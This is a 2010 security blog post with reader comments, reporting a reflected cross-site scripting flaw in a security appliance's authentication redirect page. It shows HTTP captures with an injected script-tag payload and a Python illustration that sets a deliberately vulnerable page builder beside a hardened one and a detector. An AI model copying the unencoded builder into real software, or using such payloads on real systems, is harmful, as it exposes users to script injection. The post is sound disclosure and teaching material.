Friday, March 5, 2010

more xss introduced by security devices

soooo, i found this a while back, and it may be patched or who knows... but i (re?)'rediscovered' it n kinda had to be snarky n vocal about it... such a surprise, i know ;)

it's kinda similar to the xss introduced by an intermediate security device post from a bit back...

i see a little light-weight web server i'm not familiar with, and kinda assume it had to be made in the last i donno... 10 years? so these guys who made it are sitting around a table and they're like:

"hey, let's make (or buy) this simple http server that just does some simple stuff really well and *nothing else*, and use it as a workhorse for these expensive widgets we want to sell!"

and later, someone says:

"man, we need a simple http server to run this security service that authenticates unknown users" and they build it into a security-ish widget...

an unauthenticated user requests a page:

GET /somethin.aspx?foo=bar HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; ...)
Accept: */*
Pragma: no-cache
Host: somehost.domain.tld

...

and the little server that could redirects them to authenticate:

HTTP/1.1 200 OK
Server: ********gw
Content-Type: text/html
...

<HTML><HEAD><TITLE>***********************Authentication Redirect</TITLE><META http-equiv="Cache-control" content="no-cache"><META http-equiv="Pragma" content="no-cache"><META http-equiv="Expires" content="-1"><META http-equiv="refresh" content="1; URL=https://an.auth.svr/login.html?redirect=http://somehost.domain.tld/somethin.aspx?foo=bar"></HEAD></HTML>


of course the server encodes the output reflected in th-...


GET /somethin.aspx?foo=bar"></head><body><script>alert('wot?')</script></body> HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; ...)
Accept: */*
Pragma: no-cache
Host: somehost.domain.tld

...


HTTP/1.1 200 OK
Server: ********gw
Content-Type: text/html
...

<HTML><HEAD><TITLE>***********************Authentication Redirect</TITLE><META http-equiv="Cache-control" content="no-cache"><META http-equiv="Pragma" content="no-cache"><META http-equiv="Expires" content="-1"><META http-equiv="refresh" content="1; URL=https://an.auth.svr/login.html?redirect=http://somehost.domain.tld/somethin.aspx?foo=bar"></head><body><script>alert('wot?')</script></body>"></HEAD></HTML>
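to show what the little server should have done with that request target, here's an added example (mine, not the device's code): a function that builds the meta-refresh page the way the captures show it, next to one that percent-encodes the original URL and HTML-escapes the attribute, plus a same-host check for the redirect value since the post notes it's completely arbitrary. the auth server and host names are taken from the captures above; everything else is assumed for illustration.

```python
from html import escape
from urllib.parse import quote, urlsplit

# Assumed names: the login page and host are the ones shown in the post's
# captures; the functions themselves are illustrative, not the device's code.
AUTH_SERVER = "https://an.auth.svr/login.html"
PROTECTED_HOST = "somehost.domain.tld"

# A request target constructed after the post's second capture.
INJECTED_TARGET = '/somethin.aspx?foo=bar"></head><body><script>alert(\'wot?\')</script></body>'


def vulnerable_redirect_page(host: str, request_target: str) -> str:
    """Mirrors the device: the raw request target is pasted into the
    meta-refresh URL unencoded, so a '"' in it closes the content attribute."""
    original = f"http://{host}{request_target}"
    return ('<HTML><HEAD><TITLE>Authentication Redirect</TITLE>'
            '<META http-equiv="refresh" content="1; URL='
            f'{AUTH_SERVER}?redirect={original}"></HEAD></HTML>')


def hardened_redirect_page(host: str, request_target: str) -> str:
    """Same page with two layers of output encoding: the original URL is
    percent-encoded as a query value, then the finished URL is HTML-escaped
    before it lands inside the attribute."""
    original = f"http://{host}{request_target}"
    login_url = f"{AUTH_SERVER}?redirect={quote(original, safe='')}"
    return ('<HTML><HEAD><TITLE>Authentication Redirect</TITLE>'
            '<META http-equiv="refresh" content="1; URL='
            f'{escape(login_url, quote=True)}"></HEAD></HTML>')


def redirect_allowed(original: str, expected_host: str) -> bool:
    """Open-redirect check for the login server side: only send the user
    back to the host the gateway protects, over http(s)."""
    parts = urlsplit(original)
    return parts.scheme in ("http", "https") and parts.netloc.lower() == expected_host


def breaks_out_of_attribute(page: str) -> bool:
    """Crude detector for the post's symptom: a script tag in a page that
    should contain nothing but a meta refresh."""
    return "<script" in page.lower()
```

with the hardened builder the injected quote and tags come back as %22%3E%3C... inside the redirect parameter, which is exactly where the browser leaves them.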


you've gotta wonder... how many code releases and updates has the server gone through, since... ummmm.... 2005? You know, have you thought about output encoding in the last *5 years* since an xss worm made headlines w/ mainstream media? how much revenue did this bring you in the last 5 years? annnnnd how much is a simple static or dynamic analysis?

that's not to say that this looks wormy, for a couple of reasons. plus, modern anti-xss filters seem to protect against it.

one interesting bit is that the redirect values are completely arbitrary and seamless in the browser, which maybe makes a targeted attack easier because the victim URL can be anything...?


***note: the vuln here is _not_ in msnbc.com***
***another note: ie8 anti-xss filter disabled for this screenshot***

other than that, it doesn't look like anything terribly special really, and someone has prolly already posted somethin about it somewhere, cause you just kinda trip over it if you get within 30 feet of the server...

anywho, that's all for now ;)

3 comments:

ShawnM said...

GoAheadWebs FTL. Just a guess, GoAheadWebs is one of the tiny webservers I see a lot, running on VxWorks, typically. I see crap like this on every embedded device I've ever looked at. Also lots of session ugliness and auth problems. Tends to happen when you have 500k of firmware to write a single-threaded web server in.

rwnin said...

nice guess, but it's a different product ;)

i agree this type of low-level vuln occurs all too often...

and that's kinda the point of the post. when do we get to have a reasonable level of expectation that security products we pay for have been vetted for *at least* simple well-known vulnerabilities?

when do we see vendors saying "i'll spend an extra 30 cents on a chip that can implement the spec well" instead of saying "no one will notice, it'll be fine and we'll save a few dollars"?

Unknown said...

i like your post and i enjoy reading it. thanks for sharing! CCTV Camera in London